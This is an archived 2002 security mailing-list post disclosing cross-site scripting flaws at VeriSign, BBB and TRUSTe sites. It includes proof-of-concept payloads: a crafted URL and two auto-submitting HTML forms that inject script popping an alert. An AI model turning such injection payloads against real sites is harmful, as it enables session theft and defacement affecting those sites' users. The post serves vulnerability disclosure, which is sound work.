CSS(Cross-Site Scripting) at digitalid.verisign.com, www.bbb.org & www.truste.org.

From: Liu Die Yu (liudieyuinchinaat_private)
Date: Tue Jul 16 2002 - 00:37:10 PDT

Next message: Kai Kretschmann: "Insecure Online Update with quicktime?"

Previous message: Mark Ruth: "Re: OpenBSD rootkit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) CSS(Cross-Site Scripting) at digitalid.verisign.com, www.bbb.org & www.truste.org. ---== *Useful* info==--- [1].digitalid.verisign.com is the *sign* of VeriSign. Unfortunately, it is CSS vulnerable. CODE:URL https://digitalid.verisign.com/cgi-bin/Xquery.exe?Template=&form_file=../fdf/authCertByIssuer.fdf&issuerSerial=9cef871936b857a17a7d8bb1810ac742"><P STYLE="left:expression(eval('alert(\'boop\')'))"> (Passed using MSIE 5.5) [2].www.bbb.org is the body of BBB. Again, CSS vulnerable. CODE:.HTM file ----------cut-here--------- <html> <body> <form NAME="theform" ACTION="http://www.bbb.org/contact/promail.asp" METHOD="POST"> <input type="text" name="username" size="10000" Value=""><SCRIPT>alert("boop");</SCRIPT>"> <input type="submit" value="Submit" name="btnSubmit">  <input type="reset" value="Reset" name="btnReset"> </form> <script> theform.submit(); </script> </BODY> </html> ----------cut-here--------- (Passed using MSIE5.5) [3].www.truste.org is not trustable for CSS at present. CODE:.HTML file -------Cut-here----------- <html> <body> <form name=theform action="http://www.truste.org/cgi-mojo/mojo.cgi" method=POST> <input type="text" name="email" size="12345" value=""">><SCRIPT>alert("boop");</SCRIPT>"> <input type="submit" style='font-size: 12px; font-family:arial,verdana, sans-serif; background-color: #CC9966; color: #000000; font-weight:bold;border-style:groove' value="Signup"> </form> <SCRIPT> theform.submit(); </SCRIPT> </body> </html> -------cut-here---------- (Passed using MSIE5.5) [4].Note:for info on CSS, visit cert.org ---==Contact me==--- email:LiuDieYuInChinaat_private:) I am a student in the Xiang Tan University in HN,CN;My handle is Liu Die Yu. Glad to be your friend. ---==fOR FUN==--- Can anyone send a postcard(NOT A BOMB) to me? Postal Address: #B102 Xiang Tan Da Xue,411105,Hu Nan,CHINA ---==Sth serious(but not technical)==--- It is even hard to imagine that these sites, which are important sites for online business, are CSS vulneralbe.I think the security agencies are fooling around.

Next message: Kai Kretschmann: "Insecure Online Update with quicktime?"
Previous message: Mark Ruth: "Re: OpenBSD rootkit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jul 16 2002 - 09:42:02 PDT